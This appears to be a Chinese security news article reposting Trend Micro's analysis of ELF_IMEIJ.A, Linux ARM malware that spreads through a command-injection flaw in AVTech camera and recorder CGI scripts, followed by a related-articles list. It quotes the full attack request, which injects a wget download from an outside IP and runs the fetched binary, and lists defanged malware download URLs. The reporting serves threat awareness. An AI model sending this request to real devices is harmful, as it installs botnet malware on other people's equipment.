趋势科技:恶意软件利用Linux CGI 漏洞进行传播

简介: 本文讲的是趋势科技:恶意软件利用Linux CGI 漏洞进行传播,Linux一直是企业平台和物联网制造商的首选操作系统,基于Linux的设备也被不断部署在许多不同行业的智能系统中,不过随着其广泛使用,我们也看到了以Linux为攻击目标的安全威胁数量正在快速上升。
本文讲的是 趋势科技:恶意软件利用Linux CGI 漏洞进行传播

趋势科技:恶意软件利用Linux CGI 漏洞进行传播

Linux一直是企业平台和物联网制造商的首选操作系统,基于Linux的设备也被不断部署在许多不同行业的智能系统中,不过随着其广泛使用,我们也看到了以Linux为攻击目标的安全威胁数量正在快速上升。我们以前报告了2016年一系列的Linux威胁,其中最引人注目的是Mirai恶意软件。

最近检测到的一个针对Linux ARM的恶意软件ELF_IMEIJ.A(趋势科技检测并标记为ELF_IMEIJ.A)。ELF_IMEIJ.A利用了AVTech(一家监控技术公司)设备中的一个漏洞。该漏洞由Search-Lab(一个安全研究机构)发现并报告,并于2016年10月向AVTech披露。但是,截至目前似乎厂家还没有对这个漏洞进行修复。

ELF_IMEIJ.A和Mirai的比较

ELF_IMEIJ.A通过RFIs在cgi-bin脚本中进行传播。远程攻击者将此请求发送到随机IP地址,并尝试利用此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

具体来说,ELF_IMEIJ.A就是利用AVTech所报告的CGI目录漏洞CloudSetup.cgi来执行触发恶意软件下载的命令注入。攻击者欺骗设备下载恶意文件,并更改文件的权限,最终进行恶意攻击。

趋势科技:恶意软件利用Linux CGI 漏洞进行传播

ELF_IMEIJ.A的攻击起始于连接AVTech的设备,如支持AVTech云的IP摄像机,CCTV设备和网络录像机。一旦这些设备感染了这个恶意软件,恶意程序就会开始收集系统信息和用户的网络活动数据。它还可以执行来自恶意actor的shell命令,启动分布式拒绝服务(DDoS)攻击并让自己进入休眠状态。更危险的是,受感染的设备还会将连接到同一网络的其他设备也感染了。

目前,趋势科技检测到总共有三个IP地址可以下载ELF_IMEIJ.A,并且这三个IP都托管在两个单独的ISP上。

hxxp://172.247.116.3:8080/Arm1
hxxp://172.247.116.21:85/Arm1
hxxp://192.154.108.2:8080/Arm1

经过分析,托管的ISP位于韩国。

根据报道,AVTech目前已有超过13万个不同的设备连接到互联网,所以ELF_IMEIJ.A的攻击可以进行大规模的攻击,更糟的是,如果ELF_IMEIJ.A把这些设备可以变成网络僵尸,那可以用于发动大规模的DDoS攻击。与大多数网络连接设备一样,它们并不是默认安全的,不可能直接监控。

ELF_IMEIJ.A所带来的DDoS攻击可能会与Mirai比较相似,但他们也有明显的区别:

趋势科技:恶意软件利用Linux CGI 漏洞进行传播




原文发布时间为:2017年3月20日
本文作者:xiaohui
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
安全 Ubuntu Linux
Linux Kernel 权限提升漏洞 (CVE-2023-32233)
Linux Netfilter 是一个在 Linux 内核中的网络数据包处理框架,也称作 iptables,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分
289 1
Linux Kernel 权限提升漏洞 (CVE-2023-32233)
|
安全 Linux 数据安全/隐私保护
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
通过上述步骤,你可以在Linux服务器上使用OpenVAS进行漏洞检测。请注意,漏洞检测和扫描是一个复杂的过程,需要持续的更新和管理。建议参考OpenVAS的官方文档和用户指南,以了解更多关于配置和使用OpenVAS的详细信息。
146 0
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
|
安全 Ubuntu Linux
Linux Kernel openvswitch模块权限提升漏洞(CVE-2022-2639)
Linux 内核模块Open vSwitch 存在越界写入漏洞,在足够多actions情况下,在为新的flow的新的action拷贝和预留内存时,如果next_offset比MAX_ACTIONS_BUFSIZE大,reserve_sfa_size并不会如期返回 -EMSGSIZE,此时会产生越界写入漏洞。攻击者可以利用该漏洞将普通权限提升至ROOT权限。
138 1
|
安全 Linux
Linux内核OverlayFS子系统权限提升漏洞(CVE-2023-0386)
Linux内核OverlayFS子系统权限提升漏洞,在Linux内核的 OverlayFS子系统中,当用户将一个具有权限的文件从一个nosuid挂载点复制到另一个挂载点时,未经授权的攻击者可以执行setuid文件,导致权限提升。
226 1
|
安全 Ubuntu Linux
CVE-2021-3560 Linux Polkit 权限提升漏洞
Polkit是默认安装在很多Linux发行版上的系统服务,它由systemd使用,因此任何使用systemd的Linux发行版也使用Polkit。
179 2
|
16天前
|
安全 网络协议 Linux
结合 `nc` 工具利用笑脸漏洞(Smile Bug)攻击 Metasploitable2 Linux
本文介绍如何使用 `nc`(Netcat)工具结合笑脸漏洞(Smiley Bug)攻击 Metasploitable2 Linux 靶机。首先概述了 `nc` 的基本功能和高级用法,包括建立连接、监听端口、文件传输等操作。接着详细描述了笑脸漏洞的原理及其在网络攻防中的应用,展示了通过 `nc` 发送恶意输入检测漏洞的方法。最后结合 Python 脚本实现更复杂的攻击场景,并强调了合法性和环境隔离的重要性。
43 13
|
2月前
|
安全 算法 Linux
Linux 服务器还有漏洞?建议使用 OpenVAS 日常检查!
在数字化时代,Linux 服务器的安全至关重要。OpenVAS 是一款优秀的开源漏洞扫描工具,可以帮助及时发现并修复服务器中的安全隐患。本文将介绍 OpenVAS 的主要功能、使用方法及应对漏洞的措施,帮助用户加强服务器安全管理,确保企业数字化安全。
93 7
|
6月前
|
弹性计算 安全 Linux
云服务器 ECS产品使用问题之如何处理Linux软件漏洞
云服务器ECS(Elastic Compute Service)是各大云服务商阿里云提供的一种基础云计算服务,它允许用户租用云端计算资源来部署和运行各种应用程序。以下是一个关于如何使用ECS产品的综合指南。
|
8月前
|
安全 算法 Linux
【专栏】Linux 服务器还有漏洞?OpenVAS 是一款开源的漏洞扫描工具,用于全面评估 Linux 服务器安全
【4月更文挑战第28天】OpenVAS 是一款开源的漏洞扫描工具,用于全面评估 Linux 服务器安全。它具有全面性、准确性和实时性的特点,能扫描各种设备并及时发现安全漏洞。使用 OpenVAS 包括安装、配置和执行扫描,以及分析结果并采取修复措施。在使用过程中应注意扫描时间、范围和策略的选择。通过定期检查和修复漏洞,结合其他安全措施,可以提升服务器安全性。OpenVAS 是保障 Linux 服务器安全的重要工具,但安全维护也需要持续学习和适应新挑战。
221 1
|
Ubuntu 安全 Linux
CVE-2021-3493 Linux kernel提权漏洞复现
CVE-2021-3493 Linux kernel提权漏洞复现
242 0